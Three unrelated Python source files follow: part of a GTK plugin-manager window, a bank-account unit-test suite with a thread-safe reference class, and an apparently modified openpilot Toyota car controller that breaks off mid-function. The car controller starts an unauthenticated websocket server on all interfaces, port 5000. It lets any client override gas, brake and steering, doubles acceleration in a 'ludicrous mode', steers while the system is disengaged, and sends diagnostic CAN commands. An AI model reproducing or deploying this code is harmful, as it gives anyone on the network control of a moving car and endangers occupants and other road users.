def _reload(self):
model_row = self._selected_model_row
named_row = _ModelNamedRow(*model_row)
if named_row.type == _ROW_TYPE_CATALOG:
self._worker_thread_start(self._reload_catalog_tsafe, model_row, named_row)
elif named_row.type == _ROW_TYPE_REPOSITORY:
# this just reloads the entire parent catalog, individual repositories
# can not be reloaded at this time
parent_model_row = model_row.parent
parent_named_row = _ModelNamedRow(*parent_model_row)
if parent_named_row.type != _ROW_TYPE_CATALOG:
self.logger.warning('repository treeview row\'s parent is not a catalog')
return
self._worker_thread_start(self._reload_catalog_tsafe, parent_model_row, parent_named_row)
elif named_row.type == _ROW_TYPE_PLUGIN:
if not named_row.installed:
return
self._worker_thread_start(self._reload_plugin_tsafe, model_row, named_row)
else:
self.logger.warning('reload selected for an unsupported row type')
def _reload_catalog_tsafe(self, model_row, named_row):
self._update_status_bar_tsafe('Reloading catalog...')
self._model.remove(model_row.iter)
if named_row.id == _LOCAL_REPOSITORY_ID:
self._load_catalog_local_tsafe()
else:
catalog_url = self.catalog_plugins.get_cache().get_catalog_by_id(named_row.id)['url']
if catalog_url:
self._load_catalog_from_url_tsafe(catalog_url)
self._update_status_bar_tsafe('Reloading catalog... completed.')
def _reload_plugin_tsafe(self, model_row, named_row, enabled=None):
self._update_status_bar_tsafe('Reloading plugin...')
pm = self.application.plugin_manager
if enabled is None:
enabled = named_row.id in pm.enabled_plugins
pm.unload(named_row.id)
try:
klass = pm.load(named_row.id, reload_module=True)
except Exception as error:
self._on_plugin_load_error_tsafe(named_row.id, error)
klass = None
else:
if enabled:
pm.enable(named_row.id)
self.__load_errors.pop(named_row.id, None)
gui_utilities.glib_idle_add_once(self.__reload_plugin_post, model_row, named_row, klass)
return klass
def __reload_plugin_post(self, model_row, named_row, klass=None):
if model_row.path is not None:
if named_row.id == self._selected_named_row.id:
self._set_info(model_row)
if klass is None:
self._set_model_item(model_row.path, title="{0} (Reload Failed)".format(named_row.id))
else:
self._set_model_item(
model_row.path,
title=klass.title,
compatibility='Yes' if klass.is_compatible else 'No',
version=klass.version
)
self._update_status_bar('Reloading plugin... completed.')
def _remove_matching_plugin(self, named_row, plugin_src):
repo_model = None
for catalog_model in self._model:
catalog_id = _ModelNamedRow(*catalog_model).id
if plugin_src and catalog_id == plugin_src['catalog_id']:
repo_model = next((rm for rm in catalog_model.iterchildren() if _ModelNamedRow(*rm).id == plugin_src['repo_id']), None)
break
elif plugin_src is None and catalog_id == _LOCAL_REPOSITORY_ID:
# local installation acts as a pseudo-repository
repo_model = catalog_model
break
if not repo_model:
return False
for plugin_model_row in repo_model.iterchildren():
named_model = _ModelNamedRow(*plugin_model_row)
if named_model.id != named_row.id:
continue
if named_model.enabled:
self._plugin_disable(plugin_model_row)
self._plugin_uninstall(plugin_model_row)
return True
return False
@property
def _selected_model_row(self):
treeview = self.gobjects['treeview_plugins']
selection = treeview.get_selection()
if not selection.count_selected_rows():
return None
(model, tree_paths) = selection.get_selected_rows()
return model[tree_paths[0]]
@property
def _selected_named_row(self):
model_row = self._selected_model_row
return _ModelNamedRow(*model_row) if model_row else None
def _set_model_item(self, model_path, **kwargs):
model_row = self._model[model_path]
for key, value in kwargs.items():
model_row[_ModelNamedRow._fields.index(key)] = value
def _set_info(self, model_instance):
named_model = _ModelNamedRow(*model_instance)
stack = self.gobjects['stack_info']
textview = self.gobjects['textview_plugin_info']
buf = textview.get_buffer()
buf.delete(buf.get_start_iter(), buf.get_end_iter())
model_id = named_model.id
if named_model.type == _ROW_TYPE_PLUGIN:
if model_id in self.__load_errors:
stack.set_visible_child(textview)
self._set_info_plugin_error(model_instance)
else:
stack.set_visible_child(self.gobjects['grid_plugin_info'])
self._set_info_plugin(model_instance)
else:
self._set_info_nonplugin(model_instance)
def _set_info_nonplugin(self, model_instance):
stack = self.gobjects['stack_info']
stack.set_visible_child(self.gobjects['grid_catalog_repo_info'])
named_model = _ModelNamedRow(*model_instance)
obj_catalog = None
# hide catalog repo labels
self.gobjects['label_catalog_repo_info_maintainers'].set_property('visible', False)
self.gobjects['label_catalog_repo_info_for_maintainers'].set_property('visible', False)
self.gobjects['label_catalog_repo_info_description'].set_property('visible', False)
self.gobjects['label_catalog_repo_info_for_description'].set_property('visible', False)
self.gobjects['label_catalog_repo_info_homepage'].set_property('visible', False)
self.gobjects['label_catalog_repo_info_title'].set_text(named_model.title)
if not named_model.id:
return
if named_model.type == _ROW_TYPE_CATALOG:
obj = self.catalog_plugins.catalogs.get(named_model.id, None)
if not obj:
return
else:
obj_catalog = self.catalog_plugins.catalogs.get(_ModelNamedRow(*model_instance.parent).id, None)
if not obj_catalog:
return
obj = self.catalog_plugins.catalogs[_ModelNamedRow(*model_instance.parent).id].repositories[named_model.id]
maintainers = getattr(obj, 'maintainers', getattr(obj_catalog, 'maintainers', None))
if maintainers:
self.gobjects['label_catalog_repo_info_maintainers'].set_text('\n'.join(maintainers))
self.gobjects['label_catalog_repo_info_maintainers'].set_property('visible', True)
self.gobjects['label_catalog_repo_info_for_maintainers'].set_property('visible', True)
if getattr(obj, 'description', None):
self.gobjects['label_catalog_repo_info_description'].set_text(obj.description)
self.gobjects['label_catalog_repo_info_description'].set_property('visible', True)
self.gobjects['label_catalog_repo_info_for_description'].set_property('visible', True)
if getattr(obj, 'homepage', None) or getattr(obj, 'url', None):
url = getattr(obj, 'homepage', getattr(obj, 'url', None))
            self.gobjects['label_catalog_repo_info_homepage'].set_markup("<a href=\"{0}\">Homepage</a>".format(url.replace('"', '&quot;')))
self.gobjects['label_catalog_repo_info_homepage'].set_property('tooltip-text', url)
self.gobjects['label_catalog_repo_info_homepage'].set_property('visible', True)
def _set_info_plugin(self, plugin_model):
named_model = _ModelNamedRow(*plugin_model)
pm = self.application.plugin_manager
self._last_plugin_selected = plugin_model
if named_model.id in pm.loaded_plugins:
plugin = pm.loaded_plugins[named_model.id].metadata
is_compatible = plugin['is_compatible']
else:
repo_model, catalog_model = self._get_plugin_model_parents(plugin_model)
plugin = self.catalog_plugins.get_collection(catalog_model.id, repo_model.id)[named_model.id]
is_compatible = self.catalog_plugins.is_compatible(catalog_model.id, repo_model.id, named_model.id)
self.gobjects['label_plugin_info_title'].set_text(plugin['title'])
self.gobjects['label_plugin_info_compatible'].set_text('Yes' if is_compatible else 'No')
self.gobjects['label_plugin_info_version'].set_text(plugin['version'])
self.gobjects['label_plugin_info_authors'].set_text('\n'.join(plugin['authors']))
self.gobjects['label_plugin_info_description'].set_text(plugin['description'])
self._set_info_plugin_homepage_url(plugin['homepage'])
self._set_info_plugin_reference_urls(plugin.get('reference_urls', []))
classifiers = plugin.get('classifiers', [])
if classifiers:
self.gobjects['label_plugin_info_for_classifiers'].set_property('visible', True)
listbox = self.gobjects['listbox_plugin_info_classifiers']
listbox.set_property('visible', True)
gui_utilities.gtk_listbox_populate_labels(listbox, classifiers)
else:
self.gobjects['label_plugin_info_for_classifiers'].set_property('visible', False)
def _set_info_plugin_error(self, model_instance):
id_ = _ModelNamedRow(*model_instance).id
textview = self.gobjects['textview_plugin_info']
buf = textview.get_buffer()
exc, formatted_exc = self.__load_errors[id_]
buf.insert(buf.get_end_iter(), "{0!r}\n\n".format(exc), -1)
buf.insert(buf.get_end_iter(), ''.join(formatted_exc), -1)
def _set_info_plugin_homepage_url(self, url=None):
label_homepage = self.gobjects['label_plugin_info_homepage']
if url is None:
label_homepage.set_property('visible', False)
return
        label_homepage.set_markup("<a href=\"{0}\">Homepage</a>".format(url.replace('"', '&quot;')))
label_homepage.set_property('tooltip-text', url)
label_homepage.set_property('visible', True)
def _set_info_plugin_reference_urls(self, reference_urls):
label = self.gobjects['label_plugin_info_for_references']
listbox = self.gobjects['listbox_plugin_info_references']
gui_utilities.gtk_widget_destroy_children(listbox)
if not reference_urls:
label.set_property('visible', False)
listbox.set_property('visible', False)
return
label.set_property('visible', True)
listbox.set_property('visible', True)
gui_utilities.gtk_listbox_populate_urls(listbox, reference_urls, signals={'activate-link': self.signal_label_activate_link})
def _show_dialog_busy(self):
gui_utilities.show_dialog_warning('Currently Busy', self.window, 'An operation is already running.')
def _show_dialog_error_tsafe(self, title, message):
gui_utilities.glib_idle_add_once(gui_utilities.show_dialog_error, title, self.window, message)
def _toggle_enabled_cell_data_func(self, column, cell, model, tree_iter, _):
if model.get_value(tree_iter, 0) in self.__load_errors:
cell.set_property('inconsistent', True)
else:
cell.set_property('inconsistent', False)
def _toggle_install_cell_data_func(self, column, cell, model, tree_iter, _):
cell.set_property('inconsistent', model.get_value(tree_iter, 0) == self.__installing_plugin)
def _update_status_bar(self, string_to_set):
self.status_bar.pop(0)
self.status_bar.push(0, string_to_set)
def _update_status_bar_tsafe(self, string_to_set):
gui_utilities.glib_idle_add_once(self._update_status_bar, string_to_set)
def _worker_thread_start(self, target, *args, **kwargs):
"""
Start a worker thread. This must only be called from the main GUI thread
and *target* must be a tsafe method.
"""
if not self._worker_thread_is_ready:
self._show_dialog_busy()
self.logger.debug('plugin manager worker thread is alive, can not start a new one')
return False
self._worker_thread = utilities.Thread(target=target, args=args, kwargs=kwargs)
self._worker_thread.start()
return True
@property
def _worker_thread_is_ready(self):
return self._worker_thread is None or not self._worker_thread.is_alive()
#
# Catalog Loading Methods
#
    # Each of these functions loads the catalog and handles adding it to the
    # TreeView as necessary.
#
def _load_catalogs_tsafe(self, refresh=False):
self._installed_plugins_treeview_tracker = copy.deepcopy(self.config['plugins.installed'])
for plugin in list(self._installed_plugins_treeview_tracker.keys()):
# Remove plugins already found to be locally installed.
if not self._installed_plugins_treeview_tracker[plugin]:
self._installed_plugins_treeview_tracker.pop(plugin)
if refresh:
gui_utilities.glib_idle_add_once(self._model.clear)
expiration = datetime.timedelta(seconds=smoke_zephyr.utilities.parse_timespan(self.config.get('cache.age', '4h')))
self._update_status_bar_tsafe('Loading, catalogs...')
self._load_catalog_local_tsafe()
catalog_cache = self.catalog_plugins.get_cache()
now = datetime.datetime.utcnow()
for catalog_url in self.config['catalogs']:
catalog_cache_dict = catalog_cache.get_catalog_by_url(catalog_url)
if not refresh and catalog_cache_dict and catalog_cache_dict['created'] + expiration > now:
catalog = self._load_catalog_from_cache_tsafe(catalog_cache_dict)
if catalog is not None:
continue
catalog_cache_dict = None
self.logger.debug("downloading catalog: {}".format(catalog_url))
self._update_status_bar_tsafe("Loading, downloading catalog: {}".format(catalog_url))
catalog = self._load_catalog_from_url_tsafe(catalog_url)
if catalog is None and catalog_cache_dict is not None:
self.logger.warning('failing over to loading the catalog from the cache')
self._load_catalog_from_cache_tsafe(catalog_cache_dict)
if self._installed_plugins_treeview_tracker:
self._load_missing_plugins_tsafe()
self._update_status_bar_tsafe('Loading completed')
self._installed_plugins_treeview_tracker = None
def _load_missing_plugins_tsafe(self):
local_model_row = None
for plugin in self._installed_plugins_treeview_tracker.keys():
self.logger.warning("plugin {} was not found in any loaded catalog or repo, moving to locally installed".format(plugin))
self.config['plugins.installed'][plugin] = None
self._installed_plugins_treeview_tracker[plugin] = None
for model_row in self._model:
if _ModelNamedRow(*model_row).id == _LOCAL_REPOSITORY_ID:
gui_utilities.glib_idle_add_wait(self._model.remove, model_row.iter)
break
else:
raise RuntimeError('failed to find the local plugin repository')
self._load_catalog_local_tsafe()
def _load_catalog_from_cache_tsafe(self, catalog_cache_dict):
catalog = None
try:
catalog = Catalog(catalog_cache_dict['value'])
except (KeyError, TypeError) as error:
self.logger.warning("{0} error when trying to add catalog dict to manager".format(error.__class__.__name))
else:
self.catalog_plugins.add_catalog(catalog, catalog_url=catalog_cache_dict['url'], cache=False)
self._add_catalog_to_tree_tsafe(catalog)
return catalog
def _load_catalog_from_url_tsafe(self, catalog_url):
catalog = None
try:
catalog = Catalog.from_url(catalog_url)
except requests.exceptions.ConnectionError:
self.logger.warning("connection error trying to download catalog url: {}".format(catalog_url))
self._show_dialog_error_tsafe('Catalog Loading Error', 'Failed to download catalog, check your internet connection.')
except Exception:
self.logger.warning('failed to add catalog by url: ' + catalog_url, exc_info=True)
self._show_dialog_error_tsafe('Catalog Loading Error', 'Failed to add catalog')
else:
self.catalog_plugins.add_catalog(catalog, catalog_url=catalog_url, cache=True)
self._add_catalog_to_tree_tsafe(catalog)
return catalog
def _load_catalog_local_tsafe(self):
"""
Load the plugins which are available into the treeview to make them
visible to the user.
"""
self.logger.debug('loading the local catalog')
pm = self.application.plugin_manager
self.__load_errors = {}
pm.load_all(on_error=self._on_plugin_load_error_tsafe)
node = _ModelNode(
id=_LOCAL_REPOSITORY_ID,
installed=None,
enabled=True,
title=_LOCAL_REPOSITORY_TITLE,
compatibility=None,
version=None,
visible_enabled=False,
visible_installed=False,
sensitive_installed=False,
type=_ROW_TYPE_CATALOG
)
for name, plugin in pm.loaded_plugins.items():
if self.config['plugins.installed'].get(name):
continue
self.config['plugins.installed'][name] = None
node.children.append(_ModelNamedRow(
id=plugin.name,
installed=True,
enabled=plugin.name in pm.enabled_plugins,
title=plugin.title,
compatibility='Yes' if plugin.is_compatible else 'No',
version=plugin.version,
visible_enabled=True,
visible_installed=True,
sensitive_installed=False,
type=_ROW_TYPE_PLUGIN
))
for name in self.__load_errors.keys():
node.children.append(_ModelNamedRow(
id=name,
installed=True,
enabled=False,
title="{0} (Load Failed)".format(name),
compatibility='No',
version='Unknown',
visible_enabled=True,
visible_installed=True,
sensitive_installed=False,
type=_ROW_TYPE_PLUGIN
))
gui_utilities.glib_idle_add_wait(self.__store_add_node, node)
#
# Signal Handlers
#
def signal_eventbox_button_press(self, widget, event):
if not (event.type == Gdk.EventType.BUTTON_PRESS and event.button == Gdk.BUTTON_PRIMARY):
return
if not self._last_plugin_selected:
return
named_plugin = _ModelNamedRow(*self._last_plugin_selected)
plugin_id = named_plugin.id
if plugin_id is None:
return
if plugin_id in self.application.plugin_manager:
klass = self.application.plugin_manager[plugin_id]
compatibility_details = list(klass.compatibility)
else:
repo_model, catalog_model = self._get_plugin_model_parents(self._last_plugin_selected)
compatibility_details = list(self.catalog_plugins.compatibility(catalog_model.id, repo_model.id, named_plugin.id))
popover = Gtk.Popover()
popover.set_relative_to(self.gobjects['label_plugin_info_for_compatible'])
grid = Gtk.Grid()
popover.add(grid)
grid.insert_column(0)
grid.insert_column(0)
grid.insert_column(0)
grid.set_column_spacing(3)
compatibility_details.insert(0, ('Type', 'Value', 'Met'))
row = 0
for row, req in enumerate(compatibility_details):
grid.insert_row(row)
label = Gtk.Label(req[0])
label.set_property('halign', Gtk.Align.START)
grid.attach(label, 0, row, 1, 1)
label = Gtk.Label(req[1])
label.set_property('halign', Gtk.Align.START)
grid.attach(label, 1, row, 1, 1)
label = Gtk.Label(('Yes' if req[2] else 'No') if row else req[2])
label.set_property('halign', Gtk.Align.END)
grid.attach(label, 2, row, 1, 1)
if not row:
popover.destroy()
return
popover.show_all()
def signal_expander_activate(self, expander):
paned = self.gobjects['paned_plugins']
if expander.get_property('expanded'): # collapsing
paned.set_position(paned.get_allocation().height + self._paned_offset)
def signal_label_activate_link(self, _, uri):
utilities.open_uri(uri)
def signal_paned_button_press_event(self, paned, event):
return not self.gobjects['expander_info'].get_property('expanded')
def signal_popup_menu_activate_reload(self, _):
self._reload()
def signal_popup_menu_activate_reload_all(self, _):
self._worker_thread_start(self._load_catalogs_tsafe, refresh=True)
def signal_popup_menu_activate_show_documentation(self, _):
named_row = self._selected_named_row
if named_row is None or named_row.type != _ROW_TYPE_PLUGIN:
return
if not named_row.installed:
gui_utilities.show_dialog_warning('No Documentation', self.window, 'This plugin has no documentation.')
return
try:
PluginDocumentationWindow(self.application, named_row.id)
except FileNotFoundError as error:
self.logger.warning(error.strerror)
gui_utilities.show_dialog_warning('No Documentation', self.window, error.strerror.capitalize() + '.')
def signal_popup_menu_activate_update(self, _):
model_row = self._selected_model_row
named_row = None if model_row is None else _ModelNamedRow(*model_row)
if named_row is None:
return
if not (named_row.type == _ROW_TYPE_PLUGIN and named_row.installed and named_row.sensitive_installed):
return
if not self._plugin_uninstall(model_row):
gui_utilities.show_dialog_error('Update Failed', self.window, 'Failed to uninstall the existing plugin data.')
return
self._plugin_install(model_row)
def signal_renderer_toggled_enable(self, _, path):
model_row = self._model[path]
named_row = _ModelNamedRow(*model_row)
if named_row.type != _ROW_TYPE_PLUGIN:
return
if named_row.id not in self.application.plugin_manager.loaded_plugins:
return
if named_row.id in self.__load_errors:
gui_utilities.show_dialog_error('Can Not Enable Plugin', self.window, 'Can not enable a plugin which failed to load.')
return
if named_row.enabled:
self._plugin_disable(model_row)
else:
self._plugin_enable(model_row)
def signal_renderer_toggled_install(self, _, path):
model_row = self._model[path]
named_row = _ModelNamedRow(*model_row)
if named_row.type == _ROW_TYPE_PLUGIN and named_row.installed:
if named_row.enabled:
self._plugin_disable(model_row)
self._plugin_uninstall(model_row)
else:
self._plugin_install(model_row)
def signal_treeview_row_activated(self, treeview, path, column):
model_row = self._model[path]
self._set_info(model_row)
self._popup_menu_refresh(model_row)
|
bank_account_test.py
|
import sys
import threading
import time
import unittest
from bank_account import BankAccount
class BankAccountTests(unittest.TestCase):
def setUp(self):
self.account = BankAccount()
def test_newly_opened_account_has_zero_balance(self):
self.account.open()
self.assertEqual(self.account.get_balance(), 0)
def test_can_deposit_money(self):
self.account.open()
self.account.deposit(100)
self.assertEqual(self.account.get_balance(), 100)
def test_can_deposit_money_sequentially(self):
self.account.open()
self.account.deposit(100)
self.account.deposit(50)
self.assertEqual(self.account.get_balance(), 150)
def test_can_withdraw_money(self):
self.account.open()
self.account.deposit(100)
self.account.withdraw(50)
self.assertEqual(self.account.get_balance(), 50)
def test_can_withdraw_money_sequentially(self):
self.account.open()
self.account.deposit(100)
self.account.withdraw(20)
self.account.withdraw(80)
self.assertEqual(self.account.get_balance(), 0)
def test_checking_balance_of_closed_account_throws_error(self):
self.account.open()
self.account.close()
with self.assertRaises(ValueError):
self.account.get_balance()
def test_deposit_into_closed_account(self):
self.account.open()
self.account.close()
with self.assertRaises(ValueError):
self.account.deposit(50)
def test_withdraw_from_closed_account(self):
self.account.open()
self.account.close()
with self.assertRaises(ValueError):
self.account.withdraw(50)
def test_cannot_withdraw_more_than_deposited(self):
self.account.open()
self.account.deposit(25)
with self.assertRaises(ValueError):
self.account.withdraw(50)
def test_cannot_withdraw_negative(self):
self.account.open()
self.account.deposit(100)
with self.assertRaises(ValueError):
self.account.withdraw(-50)
def test_cannot_deposit_negative(self):
self.account.open()
with self.assertRaises(ValueError):
self.account.deposit(-50)
def test_can_handle_concurrent_transactions(self):
self.account.open()
self.account.deposit(1000)
for _ in range(10):
self.adjust_balance_concurrently()
def adjust_balance_concurrently(self):
def transact():
self.account.deposit(5)
time.sleep(0.001)
self.account.withdraw(5)
# Greatly improve the chance of an operation being interrupted
# by thread switch, thus testing synchronization effectively
try:
sys.setswitchinterval(1e-12)
except AttributeError:
# For Python 2 compatibility
sys.setcheckinterval(1)
threads = []
for _ in range(1000):
t = threading.Thread(target=transact)
threads.append(t)
t.start()
for thread in threads:
thread.join()
self.assertEqual(self.account.get_balance(), 1000)
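# The BankAccount implementation under test lives in bank_account.py and is not shown
# here. A minimal thread-safe sketch that would satisfy these tests (illustrative only;
# the name _ReferenceBankAccount and all details below are assumptions, not the original
# code) guards every operation with a single threading.Lock:
class _ReferenceBankAccount(object):
    def __init__(self):
        self._lock = threading.Lock()
        self._is_open = False
        self._balance = 0

    def open(self):
        with self._lock:
            self._is_open = True
            self._balance = 0

    def close(self):
        with self._lock:
            self._check_open()
            self._is_open = False

    def get_balance(self):
        with self._lock:
            self._check_open()
            return self._balance

    def deposit(self, amount):
        with self._lock:
            self._check_open()
            if amount < 0:
                raise ValueError('cannot deposit a negative amount')
            self._balance += amount

    def withdraw(self, amount):
        with self._lock:
            self._check_open()
            if amount < 0:
                raise ValueError('cannot withdraw a negative amount')
            if amount > self._balance:
                raise ValueError('cannot withdraw more than the current balance')
            self._balance -= amount

    def _check_open(self):
        if not self._is_open:
            raise ValueError('account is not open')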
if __name__ == '__main__':
unittest.main()
|
carcontroller.py
|
from cereal import car
import json
import asyncio
from threading import Thread
import websockets
from common.params import Params
from common.numpy_fast import clip
from selfdrive.car import apply_toyota_steer_torque_limits, create_gas_command, make_can_msg, gen_empty_fingerprint
from selfdrive.car.toyota.toyotacan import create_steer_command, create_ui_command, \
create_accel_command, create_acc_cancel_command, \
create_fcw_command
from selfdrive.car.toyota.values import Ecu, CAR, STATIC_MSGS, SteerLimitParams, TSS2_CAR
from opendbc.can.packer import CANPacker
from common.op_params import opParams
#import cereal.messaging as messaging
op_params = opParams()
ludicrous_mode = op_params.get('ludicrous_mode')
VisualAlert = car.CarControl.HUDControl.VisualAlert
# Joystick state shared with the websocket receiver thread
joystick_accel = 0.000
joystick_brake = 0.000
joystick_steer = 0.000
joystick_enabled = False
joystick_started = False
joystick_alert = False
joystick_server = None
async def JoystickRecieve(websocket, path):
global joystick_accel
global joystick_brake
global joystick_steer
global joystick_enabled
global joystick_alert
async for message in websocket:
messageJson = json.loads(message)
# Check if we should make an alert
if joystick_enabled != bool(messageJson["Enabled"]):
joystick_alert = True
joystick_enabled = bool(messageJson["Enabled"])
joystick_accel = float(messageJson["Gas"])
joystick_brake = float(messageJson["Brake"])
joystick_steer = float(messageJson["Steering"])
await websocket.send(message)
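# Expected payload (inferred from the fields read above): each websocket message is a JSON
# object like {"Enabled": true, "Gas": 0.25, "Brake": 0.0, "Steering": -0.1}, where
# Gas/Brake/Steering are floats and Enabled toggles joystick control.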
def joystick_start_loop():
global joystick_server
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
joystick_server = websockets.serve(JoystickRecieve, "0.0.0.0", 5000)
loop.run_until_complete(joystick_server)
loop.run_forever()
# Accel limits
ACCEL_HYST_GAP = 0.02 # don't change accel command for small oscillations within this value
ACCEL_MAX = 3.5 # 3.5 m/s2
ACCEL_MIN = -3.5 # -3.5 m/s2
ACCEL_SCALE = max(ACCEL_MAX, -ACCEL_MIN)
# Blindspot codes
LEFT_BLINDSPOT = b'\x41'
RIGHT_BLINDSPOT = b'\x42'
BLINDSPOTALWAYSON = False
def set_blindspot_debug_mode(lr,enable):
if enable:
m = lr + b'\x02\x10\x60\x00\x00\x00\x00'
else:
m = lr + b'\x02\x10\x01\x00\x00\x00\x00'
return make_can_msg(0x750, m, 0)
def poll_blindspot_status(lr):
m = lr + b'\x02\x21\x69\x00\x00\x00\x00'
return make_can_msg(0x750, m, 0)
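# Message layout (an interpretation, not from the original comments): these are ISO-TP
# single frames addressed to the gateway at 0x750. The leading byte selects the blindspot
# monitor side (0x41 left, 0x42 right), 0x02 is the payload length, service 0x10 switches
# the diagnostic session (sub-function 0x60 for the debug session, 0x01 for default), and
# service 0x21 with identifier 0x69 polls the blindspot status.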
def accel_hysteresis(accel, accel_steady, enabled):
# for small accel oscillations within ACCEL_HYST_GAP, don't change the accel command
if not enabled:
# send 0 when disabled, otherwise acc faults
accel_steady = 0.
elif accel > accel_steady + ACCEL_HYST_GAP:
accel_steady = accel - ACCEL_HYST_GAP
elif accel < accel_steady - ACCEL_HYST_GAP:
accel_steady = accel + ACCEL_HYST_GAP
accel = accel_steady
return accel, accel_steady
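# Worked example (enabled=True, ACCEL_HYST_GAP=0.02):
#   accel_hysteresis(0.60, 0.50, True) -> steady moves to 0.58, returns (0.58, 0.58)
#   accel_hysteresis(0.50, 0.49, True) -> within the gap, returns (0.49, 0.49)
# so the commanded accel only moves when the request leaves the hysteresis band.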
class CarController():
def __init__(self, dbc_name, CP, VM):
self.last_steer = 0
self.accel_steady = 0.
self.alert_active = False
self.last_standstill = False
self.standstill_req = False
self.blindspot_blink_counter_left = 0
self.blindspot_blink_counter_right = 0
self.blindspot_debug_enabled_left = False
self.blindspot_debug_enabled_right = False
#self.sm = messaging.SubMaster(['pathPlan'])
#self.rightLaneDepart = False
#self.leftLaneDepart = False
self.last_fault_frame = -200
self.steer_rate_limited = False
self.fake_ecus = set()
if CP.enableCamera: self.fake_ecus.add(Ecu.fwdCamera)
if CP.enableDsu: self.fake_ecus.add(Ecu.dsu)
params = Params()
try:
cached_fingerprint = params.get('CachedFingerprint')
vin = params.get('CarVin')
finger = gen_empty_fingerprint()
cached_fingerprint = json.loads(cached_fingerprint)
finger[0] = {int(key): value for key, value in cached_fingerprint[2].items()}
if 0x2FF in finger[0] and vin == b'JTMWRREV10D058569': self.fake_ecus.add(Ecu.unknown)
except Exception:
pass
self.packer = CANPacker(dbc_name)
def update(self, enabled, CS, frame, actuators, pcm_cancel_cmd, hud_alert,
left_line, right_line, lead, left_lane_depart, right_lane_depart):
#if not enabled:
# self.sm.update(0)
#if self.sm.updated['pathPlan']:
# blinker = CS.out.leftBlinker or CS.out.rightBlinker
# ldw_allowed = CS.out.vEgo > 12.5 and not blinker
# CAMERA_OFFSET = op_params.get('camera_offset')
# right_lane_visible = self.sm['pathPlan'].rProb > 0.5
# left_lane_visible = self.sm['pathPlan'].lProb > 0.5
# self.rightLaneDepart = bool(ldw_allowed and self.sm['pathPlan'].rPoly[3] > -(0.93 + CAMERA_OFFSET) and right_lane_visible)
# self.leftLaneDepart = bool(ldw_allowed and self.sm['pathPlan'].lPoly[3] < (0.93 - CAMERA_OFFSET) and left_lane_visible)
# print("blinker")
# print(blinker)
# print("ldw_allowed")
# print(ldw_allowed)
# print("CAMERA_OFFSET")
# print(CAMERA_OFFSET)
# print("right_lane_visible")
# print(right_lane_visible)
# print("left_lane_visible")
# print(left_lane_visible)
# print("self.rightLaneDepart")
# print(self.rightLaneDepart)
# print("self.leftLaneDepart")
# print(self.leftLaneDepart)
# *** compute control surfaces ***
# gas and brake
global joystick_started
global joystick_thread
global joystick_enabled
global joystick_alert
global joystick_accel
global joystick_brake
global joystick_steer
# Start threading
if not joystick_started:
joystick_started = True
joystick_thread = Thread(target=joystick_start_loop, args=())
joystick_thread.start()
#print("Joystick started " + str(joystick_started));
#Set actuators to joystick
if joystick_enabled:
actuators.steer = -joystick_steer
actuators.gas = joystick_accel
actuators.brake = joystick_brake
apply_gas = clip(actuators.gas, 0., 1.)
if CS.CP.enableGasInterceptor:
# send only negative accel if interceptor is detected. otherwise, send the regular value
# +0.06 offset to reduce ABS pump usage when OP is engaged
apply_accel = 0.06 - actuators.brake
else:
apply_accel = actuators.gas - actuators.brake
apply_accel, self.accel_steady = accel_hysteresis(apply_accel, self.accel_steady, enabled)
factor = 2 if ludicrous_mode else 1
apply_accel = clip(apply_accel * ACCEL_SCALE * factor, ACCEL_MIN, ACCEL_MAX)
#if ludicrous_mode:
# print(apply_accel)
if CS.CP.enableGasInterceptor:
if CS.out.gasPressed:
apply_accel = max(apply_accel, 0.06)
if CS.out.brakePressed:
apply_gas = 0.0
apply_accel = min(apply_accel, 0.00)
else:
if CS.out.gasPressed:
apply_accel = max(apply_accel, 0.0)
if CS.out.brakePressed and CS.out.vEgo > 1:
apply_accel = min(apply_accel, 0.0)
# steer torque
new_steer = int(round(actuators.steer * SteerLimitParams.STEER_MAX))
# only cut torque when steer state is a known fault
if CS.steer_state in [9, 25]:
self.last_fault_frame = frame
# Cut steering for 1s after fault
if (frame - self.last_fault_frame < 100) or abs(CS.out.steeringRate) > 100 or (abs(CS.out.steeringAngle) > 150 and CS.CP.carFingerprint in [CAR.RAV4H, CAR.PRIUS]) or abs(CS.out.steeringAngle) > 400:
new_steer = 0
apply_steer_req = 0
else:
apply_steer_req = 1
if not enabled and right_lane_depart and CS.out.vEgo > 12.5 and not CS.out.rightBlinker:
new_steer = self.last_steer + 3
new_steer = min(new_steer , 800)
apply_steer_req = 1
if not enabled and left_lane_depart and CS.out.vEgo > 12.5 and not CS.out.leftBlinker:
new_steer = self.last_steer - 3
new_steer = max(new_steer , -800)
#print ("left")
#print (new_steer)
apply_steer_req = 1
apply_steer = apply_toyota_steer_torque_limits(new_steer, self.last_steer, CS.out.steeringTorqueEps, SteerLimitParams)
self.steer_rate_limited = new_steer != apply_steer
if not enabled and abs(apply_steer) > 800 and not (right_lane_depart or left_lane_depart):
apply_steer = 0
apply_steer_req = 0
if not enabled and CS.pcm_acc_status:
# send pcm acc cancel cmd if drive is disabled but pcm is still on, or if the system can't be activated
pcm_cancel_cmd = 1
# on entering standstill, send standstill request
if CS.out.standstill and not self.last_standstill:
self.standstill_req = True
if CS.pcm_acc_status != 8:
# pcm entered standstill or it's disabled
self.standstill_req = False
self.last_steer = apply_steer
self.last_accel = apply_accel
self.last_standstill = CS.out.standstill
can_sends = []
#*** control msgs ***
#print("steer {0} {1} {2} {3}".format(apply_steer, min_lim, max_lim, CS.steer_torque_motor)
# a toyota CAN trace shows this message at 42Hz, with the counter alternately adding 1 and 2;
# sending it at 100Hz seems to allow a higher rate limit, as the rate limit appears to be
# imposed on consecutive messages
if Ecu.fwdCamera in self.fake_ecus:
can_sends.append(create_steer_command(self.packer, apply_steer, apply_steer_req, frame))
# LTA mode. Set ret.steerControlType = car.CarParams.SteerControlType.angle and whitelist 0x191 in the panda
# if frame % 2 == 0:
# can_sends.append(create_steer_command(self.packer, 0, 0, frame // 2))
# can_sends.append(create_lta_steer_command(self.packer, actuators.steerAngle, apply_steer_req, frame // 2))
# we can spam can to cancel the system even if we are using lat only control
if (frame % 3 == 0 and CS.CP.openpilotLongitudinalControl) or (pcm_cancel_cmd and Ecu.fwdCamera in self.fake_ecus):
lead = lead or CS.out.vEgo < 12. # at low speed we always assume the lead is present so ACC can be engaged
# Lexus IS uses a different cancellation message
if pcm_cancel_cmd and CS.CP.carFingerprint == CAR.LEXUS_IS:
can_sends.append(create_acc_cancel_command(self.packer))
elif CS.CP.openpilotLongitudinalControl:
can_sends.append(create_accel_command(self.packer, apply_accel, pcm_cancel_cmd, self.standstill_req, lead, CS.distance))
else:
